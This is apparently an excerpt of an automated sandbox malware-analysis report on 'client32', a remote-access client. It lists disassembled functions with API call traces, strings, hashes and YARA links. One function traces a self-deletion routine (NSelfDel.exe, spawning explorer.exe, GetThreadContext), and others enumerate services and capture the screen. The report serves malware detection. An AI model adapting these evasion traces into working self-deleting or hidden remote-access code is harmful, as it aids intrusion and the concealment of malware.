Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
Instruction ID: 10a2649455158eed3fdc33ccecd10e2613defaba2ffe2c5b463718ad866645ae
Opcode Fuzzy Hash: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
Instruction Fuzzy Hash: 4211ECB67242475FEB11CD24D690B9EF756EFC5339F20812EE58587518D2319882CB53

Function 110F8740 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,1117CF74), ref: 110F876D

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 3ed54ede1b3f10cca51033c0e31936367da5c7eb08a16c35f026113f9e1de554
Instruction ID: 4286fe34f75cea7b88237b7f19c57be592dd9146774f55c5736f82da2c6cd1b6
Opcode Fuzzy Hash: 3ed54ede1b3f10cca51033c0e31936367da5c7eb08a16c35f026113f9e1de554
Instruction Fuzzy Hash: 9A118A71E0022D9BDB51CBA8DC557EEB7E8AB49304F0040E9E909D7340DB70AE448B91

Function 1116C936 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,110B7069,00000000,?,111665A4,?,110B7069,00000000,00000000,00000000,?,11167F37,00000001,00000214,?,110B7069), ref: 1116C979

Part of subcall function 11165ABF: __getptd_noexit.LIBCMT ref: 11165ABF

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 2c2584ae5d3c2f1a4e30704cb69b8cb8ac2400eb86a89467f06266894a6be336
Instruction ID: 4dc312edc878e3fc85dbd7a4fe26ae7c38801a5f560f23fe2cfbf25c3476fc95
Opcode Fuzzy Hash: 2c2584ae5d3c2f1a4e30704cb69b8cb8ac2400eb86a89467f06266894a6be336
Instruction Fuzzy Hash: 8A01D8317012669BFB168F66CD44B6BB79DAF81764F01452AE815CB2D0FBF1D820C780

Function 685BA082 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,685B6F16,00000000,?,685BD40B,00000001,685B6F16,00000000,00000000,00000000,?,685B6F16,00000001,00000214), ref: 685BA0C5

Part of subcall function 685B60F9: __getptd_noexit.LIBCMT ref: 685B60F9

Memory Dump Source

Source File: 00000007.00000002.4193643921.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.4193596158.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193696542.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193715550.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.4193788365.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: a86f339c534cd9872d35ca9763ea1ed858abae99b83c821955b34f32ff375265
Instruction ID: 532255076f6bd0dac442deb89763c6b1f4246476fdcb51f1bb3143e61b06de08
Opcode Fuzzy Hash: a86f339c534cd9872d35ca9763ea1ed858abae99b83c821955b34f32ff375265
Instruction Fuzzy Hash: 0501D43130721ADFFB268E65CC74B5B3794EBA13A4F81452AED35EB180DB75D800C640

Function 11163AB3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

__waccess_s.LIBCMT ref: 11163ABE

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __waccess_s
String ID:
API String ID: 4272103461-0
Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
Instruction ID: 5c2e7bbd61f30f1aea2da67b167f4c2082f9d237e02e17c26463379e16f3f813
Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
Instruction Fuzzy Hash: 1FC09B3745814D7F5F055DE5EC00C597F5DD6807747144115F91CC9490DE73E561D540

Function 1116076B Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE

Download Yara Rule

APIs

__fsopen.LIBCMT ref: 11160778

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction ID: 7f7d982cc39844611e1edaafa4e80019d2d82fc8e8e4ac42b397e22a7b0e0c70
Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction Fuzzy Hash: 0BC09B7644010C77DF111A83DC05E457F1D97C0674F144010FF1C1D1609573E971D685

Function 00401000 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

_NSMClient32@8.PCICL32(?,?,004010A8,00000000), ref: 0040100A

Memory Dump Source

Source File: 00000007.00000002.4190536241.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.4190519561.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.4190553903.0000000000403000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.4190638856.0000000000404000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_client32.jbxd

Yara matches

Similarity

API ID: Client32@8
String ID:
API String ID: 433899448-0
Opcode ID: a50aadacad94cde84f5700121068934964b21678fd47baf16d7368d0ca4f48de
Instruction ID: 101b8ead0f36abaf2e4a9e5d6dc85a2691bea7164fd7fac6f3abc260b8d29af7
Opcode Fuzzy Hash: a50aadacad94cde84f5700121068934964b21678fd47baf16d7368d0ca4f48de
Instruction Fuzzy Hash: 85B012B91043406FC104DB10C880D2B73A8BBC4300F008D0DB4D142181C734D800C632

Function 687E1E1C Relevance: 1.3, APIs: 1, Instructions: 32sleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 687E09A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,687E1E32,00000001,?,00000000,00000000,00000000,?,688075BC,00000001,00000214), ref: 687E09E8

Sleep.KERNEL32(00000000), ref: 6880F1D1

Memory Dump Source

Source File: 00000007.00000002.4193839189.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true

Associated: 00000007.00000002.4193813710.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.4193909993.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.4193930667.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.4193949987.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_687d0000_client32.jbxd

Similarity

API ID: AllocateHeapSleep
String ID:
API String ID: 4201116106-0
Opcode ID: b6b0c9f1491dee994ec473a50c7df72eefb8b705c33e06370d2d1d618162b90f
Instruction ID: 274beece8e3844bfc3e8e2f38e42855b16748084e614c2412fab217671f2a4c5
Opcode Fuzzy Hash: b6b0c9f1491dee994ec473a50c7df72eefb8b705c33e06370d2d1d618162b90f
Instruction Fuzzy Hash: BCF0A035980114ABCB105B79DE19A8A3AA6ABC2773B900733F93CC21E0DA318501C2F2

Non-executed Functions

Function 11007720 Relevance: 86.3, APIs: 35, Strings: 14, Instructions: 548windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11087A50: IsWindow.USER32(110055D2), ref: 11087A6C
Part of subcall function 11087A50: IsWindow.USER32(?), ref: 11087A86

LoadCursorA.USER32(00000000,00007F02), ref: 1100776A
SetCursor.USER32(00000000), ref: 11007771
GetDC.USER32(?), ref: 1100779D
CreateCompatibleDC.GDI32(00000000), ref: 110077AA
CreateCompatibleBitmap.GDI32(?,?,?), ref: 110078B4
SelectObject.GDI32(?,00000000), ref: 110078C2
CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 110078D6
CreateCompatibleDC.GDI32(00000000), ref: 110078E3
CreateCompatibleBitmap.GDI32(?,?,?), ref: 110078F5
SelectClipRgn.GDI32(?,00000000), ref: 11007921

Part of subcall function 11002280: DeleteObject.GDI32(?), ref: 11002291
Part of subcall function 11002280: CreatePen.GDI32(?,?,?), ref: 110022B8

Part of subcall function 11005AF0: CreateSolidBrush.GDI32(?), ref: 11005B17

BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1100794B
SelectClipRgn.GDI32(?,00000000), ref: 11007960
DeleteObject.GDI32(00000000), ref: 1100796D
DeleteDC.GDI32(?), ref: 1100797A
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 11007997
ReleaseDC.USER32(?,?), ref: 110079C6
CreatePen.GDI32(00000002,00000001,00000000), ref: 110079D1
CreateSolidBrush.GDI32(?), ref: 11007AC2
GetSysColor.USER32(00000004), ref: 11007AD0
LoadBitmapA.USER32(00000000,00002EEF), ref: 11007AE7

Part of subcall function 1113E9D0: GetObjectA.GDI32(11003D26,00000018,?), ref: 1113E9E3
Part of subcall function 1113E9D0: CreateCompatibleDC.GDI32(00000000), ref: 1113E9F1
Part of subcall function 1113E9D0: CreateCompatibleDC.GDI32(00000000), ref: 1113E9F6
Part of subcall function 1113E9D0: SelectObject.GDI32(00000000,00000000), ref: 1113EA0E
Part of subcall function 1113E9D0: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 1113EA21
Part of subcall function 1113E9D0: SelectObject.GDI32(00000000,00000000), ref: 1113EA2C
Part of subcall function 1113E9D0: SetBkColor.GDI32(00000000,?), ref: 1113EA36
Part of subcall function 1113E9D0: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 1113EA53
Part of subcall function 1113E9D0: SetBkColor.GDI32(00000000,00000000), ref: 1113EA5C
Part of subcall function 1113E9D0: SetTextColor.GDI32(00000000,00FFFFFF), ref: 1113EA68
Part of subcall function 1113E9D0: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 1113EA85
Part of subcall function 1113E9D0: SetBkColor.GDI32(00000000,?), ref: 1113EA90
Part of subcall function 1113E9D0: SetTextColor.GDI32(00000000,00000000), ref: 1113EA99
Part of subcall function 1113E9D0: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 1113EAB6
Part of subcall function 1113E9D0: SelectObject.GDI32(00000000,00000000), ref: 1113EAC1

Part of subcall function 1110C4A0: _memset.LIBCMT ref: 1110C4D2

_memset.LIBCMT ref: 11007B47
_swscanf.LIBCMT ref: 11007BB4

Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE

CreateFontIndirectA.GDI32(?), ref: 11007BE5
_memset.LIBCMT ref: 11007C0C
GetStockObject.GDI32(00000011), ref: 11007C1F
GetObjectA.GDI32(00000000), ref: 11007C26
CreateFontIndirectA.GDI32(?), ref: 11007C33
GetWindowRect.USER32(?,?), ref: 11007D76
SetWindowTextA.USER32(?,00000000), ref: 11007DB3
GetSystemMetrics.USER32(00000001), ref: 11007DD3
GetSystemMetrics.USER32(00000000), ref: 11007DF0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 11007E40
SelectObject.GDI32(?,00000000), ref: 11007906

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004C), ref: 110948BE
Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004D), ref: 110948C7
Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004E), ref: 110948CE
Part of subcall function 110948B0: GetSystemMetrics.USER32(00000000), ref: 110948D7
Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004F), ref: 110948DD
Part of subcall function 110948B0: GetSystemMetrics.USER32(00000001), ref: 110948E5

UpdateWindow.USER32(?), ref: 11007E72
SetCursor.USER32(?), ref: 11007E7F

Strings

Monitor, xrefs: 110077D7
m_hWnd, xrefs: 1100778C, 110079AE, 11007D5E, 11007DA1, 11007E1F, 11007E61
FillColour, xrefs: 11007A56
Show, xrefs: 110077DC, 1100786F
PenColour, xrefs: 11007A02
ShowAppIds, xrefs: 1100786A
%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s, xrefs: 11007BAE
PenWidth, xrefs: 11007A1E
Tool, xrefs: 110079EA
FillStyle, xrefs: 11007A6C
Annotate, xrefs: 110079EF, 11007A07, 11007A32, 11007A5B, 11007A7A, 11007B26
DISPLAY, xrefs: 110078CE
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11007787, 110079A9, 11007D59, 11007D9C, 11007E1A, 11007E5C
Font, xrefs: 11007B21

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Create$Object$MetricsSystem$Select$ColorCompatibleWindow$Bitmap$CursorDeleteText_memset$BrushClipFontIndirectLoadSolid$ErrorExitLastMessageProcessRectReleaseStockUpdate_strrchr_swscanfwsprintf
String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$DISPLAY$FillColour$FillStyle$Font$Monitor$PenColour$PenWidth$Show$ShowAppIds$Tool$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 3128222880-2303488826
Opcode ID: 9ccdacb55d0ebfb0fb2b9ac94c280c8032c5f0b1e680477492f9b7d98bf24637
Instruction ID: 7fe4da3f96bb6b92752a65c8f73994b4eca8bbb8cb15b396b098bd7e1d307798
Opcode Fuzzy Hash: 9ccdacb55d0ebfb0fb2b9ac94c280c8032c5f0b1e680477492f9b7d98bf24637
Instruction Fuzzy Hash: B72272B5A00719AFE750DF64CC88FDEF7B9BB48708F1085A9E65A97280DB74A940CF50

Function 11123570 Relevance: 68.5, APIs: 31, Strings: 8, Instructions: 289fileprocessthreadCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 11123590
_memset.LIBCMT ref: 111235AD
GetVersionExA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 111235C6
GetTempPathA.KERNEL32(00000104,?,?,?,?,?,00000000,00000000), ref: 111235E5
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112362B
_strrchr.LIBCMT ref: 1112363A
CreateFileA.KERNEL32(?,C0000000,00000005,00000000,00000002,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 11123673
WriteFile.KERNEL32(00000000,111B3308,000004D0,?,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112369F
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 111236AC
CreateFileA.KERNEL32(?,80000000,00000005,00000000,00000003,04000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 111236C7
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 111236D7
wsprintfA.USER32 ref: 111236F1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 1112371D
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1112372E
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 11123737
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1112373A
CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000044,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 11123770
GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 11123812
GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11123815
DuplicateHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11123818
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112382C
_strrchr.LIBCMT ref: 1112383B
_memmove.LIBCMT ref: 111238B4
GetThreadContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111238D4

Strings

*.*, xrefs: 11123876
explorer.exe, xrefs: 11123769
pSlash, xrefs: 11123851
"%s" %d %s, xrefs: 111236EB
iCodeSize <= sizeof(local.opCodes), xrefs: 1112389A
NSelfDel.exe, xrefs: 111235FA
D, xrefs: 111235A3
selfdelete.cpp, xrefs: 1112384C, 11123895

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileHandleProcess$CloseCreate$Current$ModuleName_memset_strrchr$ContextDuplicatePathTempThreadVersionWrite_memmovewsprintf
String ID: "%s" %d %s$*.*$D$NSelfDel.exe$explorer.exe$iCodeSize <= sizeof(local.opCodes)$pSlash$selfdelete.cpp
API String ID: 2219718054-800295887
Opcode ID: 4cc1fde5e20de1d22eceee8bdc9d3861e2b7a2064f589f295b2194325481a8e0
Instruction ID: f5da5898e03af7335dd3b432591c065ee650f23ce63a0b1c8c4037c06c323e7f
Opcode Fuzzy Hash: 4cc1fde5e20de1d22eceee8bdc9d3861e2b7a2064f589f295b2194325481a8e0
Instruction Fuzzy Hash: E2B186B5A44329AFE720DF54CC85FDAF7B8EB48704F108199E619A72C0DB70AA44CF55

Function 11127110 Relevance: 26.6, APIs: 12, Strings: 3, Instructions: 400COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00000000,00000000,?), ref: 1112714B

Strings

QueryServiceConfig2W, xrefs: 1112724A
EnumServices returned %d, xrefs: 111271F4
advapi32.dll, xrefs: 11127226

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
